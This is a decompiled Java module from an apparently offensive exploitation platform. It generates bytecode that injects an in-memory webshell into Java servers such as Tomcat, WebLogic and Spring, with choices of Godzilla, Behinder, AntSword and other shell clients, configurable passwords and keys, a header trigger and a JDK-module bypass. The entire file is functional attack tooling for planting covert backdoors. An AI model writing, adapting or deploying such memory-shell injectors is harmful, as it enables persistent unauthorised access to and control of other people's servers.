package com.ar3h.chains.gadget.impl.bytecode.inject;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.CommonUtil;
import com.ar3h.chains.common.util.FileHelper;
import jmg.core.config.AbstractConfig;
import jmg.core.config.Constants;
import jmg.sdk.jMGenerator;
import org.apache.commons.codec.binary.Base64;
import org.apache.myfaces.shared.util.CommentUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@GadgetAnnotation(name = "调用 Jmg 生成注入内存马字节码", description = "原项目地址：https://github.com/pen4uin/java-memshell-generator\n本平台内置Jmg版本v1.0.9 (2025年1月02日更新)\n该模块的报错一般是 shellType、serverType 两个参数组合存在问题\n您也可以选择手动在原版 java-memshell-generator 中生成Base64编码格式的注入内存马的字节码，然后复制到 BytecodeFromBase64 模块中，实现相同效果", authors = {Authors.Pen4uin}, priority = 10)
@GadgetTags(tags = {Tag.Bytecode, Tag.Inject, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/bytecode/inject/JmgGadget.class */
public class JmgGadget implements Gadget {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) JmgGadget.class);

    @Param(name = "内存马工具种类", description = "可选：Godzilla、Suo5、Behinder、NeoreGeorg、AntSword、Custom", type = ParamType.Choice, choices = {@Choice(Constants.TOOL_GODZILLA), @Choice(Constants.TOOL_SUO5), @Choice(Constants.TOOL_BEHINDER), @Choice(Constants.TOOL_NEOREGEORG), @Choice(Constants.TOOL_ANTSWORD)})
    public String toolType = Constants.TOOL_GODZILLA;

    @Param(name = "内存马类型", description = "可选：Listener, Filter, Valve, Interceptor, JakartaListener, JakartaFilter, WFHandlerMethod\n\n由于本框架只能做到展示所有参数，暂时无法做到自动展示特定有效的参数组合，因此某些参数组合会出现报错，所以需要注意以下问题（推荐使用原版项目生成然后复制到该平台进行使用）：\nWFHandlerMethod 仅支持 SpringWebFlux\nInterceptor 仅支持 SpringMVC", type = ParamType.Choice, choices = {@Choice(Constants.SHELL_LISTENER), @Choice(Constants.SHELL_FILTER), @Choice(Constants.SHELL_VALVE), @Choice(Constants.SHELL_INTERCEPTOR), @Choice(Constants.SHELL_JAKARTA_LISTENER), @Choice(Constants.SHELL_JAKARTA_FILTER), @Choice(Constants.SHELL_WF_HANDLERMETHOD)})
    public String shellType = Constants.SHELL_LISTENER;

    @Param(name = "目标中间件类型", description = "可选：Tomcat, Resin, Jetty, SpringMVC, SpringWebFlux, JBoss, WebLogic, WebSphere, Undertow, GlassFish, Tongweb, Apusic, InforSuite, BES\n\n需要注意以下问题：\nSpringMVC 仅支持 Interceptor\nSpringWebFlux 仅支持 WFHandlerMethod", type = ParamType.Choice, choices = {@Choice("Tomcat"), @Choice("Resin"), @Choice("Jetty"), @Choice("SpringMVC"), @Choice(Constants.SERVER_SPRING_WEBFLUX), @Choice(Constants.SERVER_JBOSS), @Choice("WebLogic"), @Choice("WebSphere"), @Choice("Undertow"), @Choice(Constants.SERVER_GLASSFISH), @Choice(Constants.SERVER_TONGWEB), @Choice(Constants.SERVER_APUSIC), @Choice(Constants.SERVER_INFORSUITE), @Choice(Constants.SERVER_BES)})
    public String serverType = "Tomcat";

    @Param(name = "Shell密码", description = "适用于填写 Godzilla密码、Behinder密码、Antsword密码\n'random' 为随机字符串，生成后可在下方 Context 中查看具体的值")
    public String pass = "random";

    @Param(name = "Shell密钥", description = "仅适用于填写 Godzilla 密钥\n'random' 为随机字符串，生成后可在下方 Context 中查看具体的值")
    public String key = "random";

    @Param(name = "url匹配路径", description = "一般情况下无需更改")
    public String urlPattern = CommentUtils.START_SCRIPT_COMMENT;

    @Param(name = "绕过JDKModule限制", type = ParamType.Boolean)
    public boolean bypassJdkModule = false;

    @Param(name = "内存马请求头Key")
    public String headerName = "Accept";

    @Param(name = "内存马请求头Value", description = "'random' 为随机字符串，生成后可在下方 Context 中查看具体的值")
    public String headerValue = "random";

    @Param(name = "Custom Shell", description = "Base64", requires = false)
    public String shellBytesBase64;
    GadgetContext context;

    public byte[] getObject() throws Exception {
        AbstractConfig abstractConfig = new AbstractConfig();
        abstractConfig.setToolType(this.toolType);
        abstractConfig.setShellType(this.shellType);
        abstractConfig.setServerType(this.serverType);
        abstractConfig.setHeaderName(this.headerName);
        if ("random".equalsIgnoreCase(this.headerValue)) {
            abstractConfig.setHeaderValue(CommonUtil.getRandomString(4, 20));
        } else {
            abstractConfig.setHeaderValue(this.headerValue);
        }
        if ("random".equalsIgnoreCase(this.pass)) {
            abstractConfig.setPass(CommonUtil.getRandomString(4, 10));
        } else {
            abstractConfig.setPass(this.pass);
        }
        if ("random".equalsIgnoreCase(this.key)) {
            abstractConfig.setKey(CommonUtil.getRandomString(4, 10));
        } else {
            abstractConfig.setKey(this.key);
        }
        if ("Custom".equalsIgnoreCase(this.shellType)) {
            abstractConfig.setShellBytes(Base64.decodeBase64(this.shellBytesBase64));
        }
        abstractConfig.setShellClassName(FileHelper.getRandomClassName());
        abstractConfig.setUrlPattern(this.urlPattern);
        abstractConfig.setEnableBypassJDKModule(this.bypassJdkModule);
        byte[] bArr = new byte[0];
        synchronized (JmgGadget.class) {
            try {
                new jMGenerator(abstractConfig).genPayload();
                bArr = abstractConfig.getInjectorBytes();
            } catch (Exception e) {
                ThrowsUtil.throwGadgetException("Invoke Jmg Error, plz check Jmg shellType、serverType params: " + e.getMessage());
            }
        }
        this.context.put("Jmg Message", SDKResultUtil.printBasicInfo(abstractConfig));
        this.context.put("Jmg Shell ClassName", abstractConfig.getShellClassName());
        this.context.put("Jmg Shell Bytecode Base64", Base64.encodeBase64String(abstractConfig.getShellBytes()));
        this.context.put("Jmg Injector ClassName", abstractConfig.getInjectorClassName());
        this.context.put("Jmg Injector Bytecode Base64", Base64.encodeBase64String(abstractConfig.getInjectorBytes()));
        return bArr;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        gadgetChain.doCreate(gadgetContext);
        return getObject();
    }
}
